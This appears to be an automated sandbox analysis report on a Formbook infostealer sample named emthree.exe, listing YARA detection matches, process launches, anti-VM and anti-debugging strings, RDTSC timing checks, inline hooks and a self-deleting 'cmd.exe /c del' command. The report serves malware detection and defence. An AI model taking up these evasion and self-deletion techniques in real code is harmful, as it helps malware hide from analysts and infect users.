Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: emthree.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@4/3

Source: C:\Users\user\Desktop\emthree.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\emthree.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6264:120:WilError_01

Source: emthree.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\emthree.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\emthree.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Source: emthree.exe	Metadefender: Detection: 35%
Source: emthree.exe	ReversingLabs: Detection: 64%

Source: unknown	Process created: C:\Users\user\Desktop\emthree.exe 'C:\Users\user\Desktop\emthree.exe'
Source: unknown	Process created: C:\Users\user\Desktop\emthree.exe {path}
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\emthree.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\emthree.exe	Process created: C:\Users\user\Desktop\emthree.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\emthree.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\emthree.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: emthree.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: emthree.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: emthree.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: emthree.exe, 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, rundll32.exe, 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: emthree.exe, rundll32.exe
Source:	Binary string: rundll32.pdb source: emthree.exe, 00000001.00000002.276125323.0000000000AF0000.00000040.00000001.sdmp
Source:	Binary string: rundll32.pdbGCTL source: emthree.exe, 00000001.00000002.276125323.0000000000AF0000.00000040.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: emthree.exe, Cycle_Jump_Game/Main.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.emthree.exe.f40000.0.unpack, Cycle_Jump_Game/Main.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.emthree.exe.f40000.0.unpack, Cycle_Jump_Game/Main.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.emthree.exe.460000.0.unpack, Cycle_Jump_Game/Main.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.emthree.exe.460000.1.unpack, Cycle_Jump_Game/Main.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Binary contains a suspicious time stamp

Show sources

Source: initial sample

Static PE information: 0xCD1766EF [Fri Jan 13 19:15:59 2079 UTC]

Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0041D0E2 push eax; ret	1_2_0041D0E8
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0041D0EB push eax; ret	1_2_0041D152
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0041D095 push eax; ret	1_2_0041D0E8
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0041D14C push eax; ret	1_2_0041D152
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_004082B3 push ebp; ret	1_2_004082B6
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0040E404 push edx; ret	1_2_0040E40F
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0041ECE9 push esp; ret	1_2_0041ECEA
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0103D0D1 push ecx; ret	1_2_0103D0E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EFD0D1 push ecx; ret	6_2_04EFD0E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02D982B3 push ebp; ret	6_2_02D982B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02DAD0EB push eax; ret	6_2_02DAD152
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02DAD0E2 push eax; ret	6_2_02DAD0E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02DAD095 push eax; ret	6_2_02DAD0E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02DAD14C push eax; ret	6_2_02DAD152
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02DAECE9 push esp; ret	6_2_02DAECEA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02D9E404 push edx; ret	6_2_02D9E40F

Source: initial sample

Static PE information: section name: .text entropy: 7.70662287757

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xEA

Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: emthree.exe PID: 4600, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\emthree.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\emthree.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 0000000002D998E4 second address: 0000000002D998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 0000000002D99B5E second address: 0000000002D99B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\emthree.exe

Code function: 1_2_00409A90 rdtsc

1_2_00409A90

Source: C:\Users\user\Desktop\emthree.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\emthree.exe	Window / User API: threadDelayed 368			Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Window / User API: threadDelayed 820			Jump to behavior

Source: C:\Users\user\Desktop\emthree.exe TID: 4612	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe TID: 6000	Thread sleep time: -41500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe TID: 2872	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1268	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1268	Thread sleep time: -70000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: explorer.exe, 00000002.00000000.260477578.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000002.494634416.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.258991839.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmp	Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000002.00000000.241832967.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000002.00000000.260992522.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000002.00000000.253126007.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000002.00000000.258991839.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.258991839.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.260992522.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmp	Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000002.00000000.258991839.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\emthree.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\emthree.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\emthree.exe

Code function: 1_2_00409A90 rdtsc

1_2_00409A90

Source: C:\Users\user\Desktop\emthree.exe

Code function: 1_2_0040ACD0 LdrLoadDll,

1_2_0040ACD0

Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE58EC mov eax, dword ptr fs:[00000030h]	1_2_00FE58EC
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE40E1 mov eax, dword ptr fs:[00000030h]	1_2_00FE40E1
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE40E1 mov eax, dword ptr fs:[00000030h]	1_2_00FE40E1
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE40E1 mov eax, dword ptr fs:[00000030h]	1_2_00FE40E1
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01004120 mov eax, dword ptr fs:[00000030h]	1_2_01004120
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01004120 mov eax, dword ptr fs:[00000030h]	1_2_01004120
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01004120 mov eax, dword ptr fs:[00000030h]	1_2_01004120
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01004120 mov eax, dword ptr fs:[00000030h]	1_2_01004120
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01004120 mov ecx, dword ptr fs:[00000030h]	1_2_01004120
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101513A mov eax, dword ptr fs:[00000030h]	1_2_0101513A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101513A mov eax, dword ptr fs:[00000030h]	1_2_0101513A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100B944 mov eax, dword ptr fs:[00000030h]	1_2_0100B944
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100B944 mov eax, dword ptr fs:[00000030h]	1_2_0100B944
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE9080 mov eax, dword ptr fs:[00000030h]	1_2_00FE9080
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100C182 mov eax, dword ptr fs:[00000030h]	1_2_0100C182
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101A185 mov eax, dword ptr fs:[00000030h]	1_2_0101A185
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01012990 mov eax, dword ptr fs:[00000030h]	1_2_01012990
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010669A6 mov eax, dword ptr fs:[00000030h]	1_2_010669A6
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010161A0 mov eax, dword ptr fs:[00000030h]	1_2_010161A0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010161A0 mov eax, dword ptr fs:[00000030h]	1_2_010161A0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A49A4 mov eax, dword ptr fs:[00000030h]	1_2_010A49A4
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A49A4 mov eax, dword ptr fs:[00000030h]	1_2_010A49A4
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A49A4 mov eax, dword ptr fs:[00000030h]	1_2_010A49A4
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A49A4 mov eax, dword ptr fs:[00000030h]	1_2_010A49A4
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010651BE mov eax, dword ptr fs:[00000030h]	1_2_010651BE
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010651BE mov eax, dword ptr fs:[00000030h]	1_2_010651BE
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010651BE mov eax, dword ptr fs:[00000030h]	1_2_010651BE
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010651BE mov eax, dword ptr fs:[00000030h]	1_2_010651BE
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]	1_2_010099BF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]	1_2_010099BF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010099BF mov eax, dword ptr fs:[00000030h]	1_2_010099BF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]	1_2_010099BF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]	1_2_010099BF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010099BF mov eax, dword ptr fs:[00000030h]	1_2_010099BF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]	1_2_010099BF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]	1_2_010099BF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010099BF mov eax, dword ptr fs:[00000030h]	1_2_010099BF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]	1_2_010099BF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]	1_2_010099BF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010099BF mov eax, dword ptr fs:[00000030h]	1_2_010099BF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FFB02A mov eax, dword ptr fs:[00000030h]	1_2_00FFB02A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FFB02A mov eax, dword ptr fs:[00000030h]	1_2_00FFB02A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FFB02A mov eax, dword ptr fs:[00000030h]	1_2_00FFB02A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FFB02A mov eax, dword ptr fs:[00000030h]	1_2_00FFB02A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010741E8 mov eax, dword ptr fs:[00000030h]	1_2_010741E8
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01067016 mov eax, dword ptr fs:[00000030h]	1_2_01067016
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01067016 mov eax, dword ptr fs:[00000030h]	1_2_01067016
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01067016 mov eax, dword ptr fs:[00000030h]	1_2_01067016
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B4015 mov eax, dword ptr fs:[00000030h]	1_2_010B4015
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B4015 mov eax, dword ptr fs:[00000030h]	1_2_010B4015
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]	1_2_00FEB1E1
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]	1_2_00FEB1E1
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]	1_2_00FEB1E1
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101002D mov eax, dword ptr fs:[00000030h]	1_2_0101002D
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101002D mov eax, dword ptr fs:[00000030h]	1_2_0101002D
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101002D mov eax, dword ptr fs:[00000030h]	1_2_0101002D
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101002D mov eax, dword ptr fs:[00000030h]	1_2_0101002D
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101002D mov eax, dword ptr fs:[00000030h]	1_2_0101002D
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A830 mov eax, dword ptr fs:[00000030h]	1_2_0100A830
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A830 mov eax, dword ptr fs:[00000030h]	1_2_0100A830
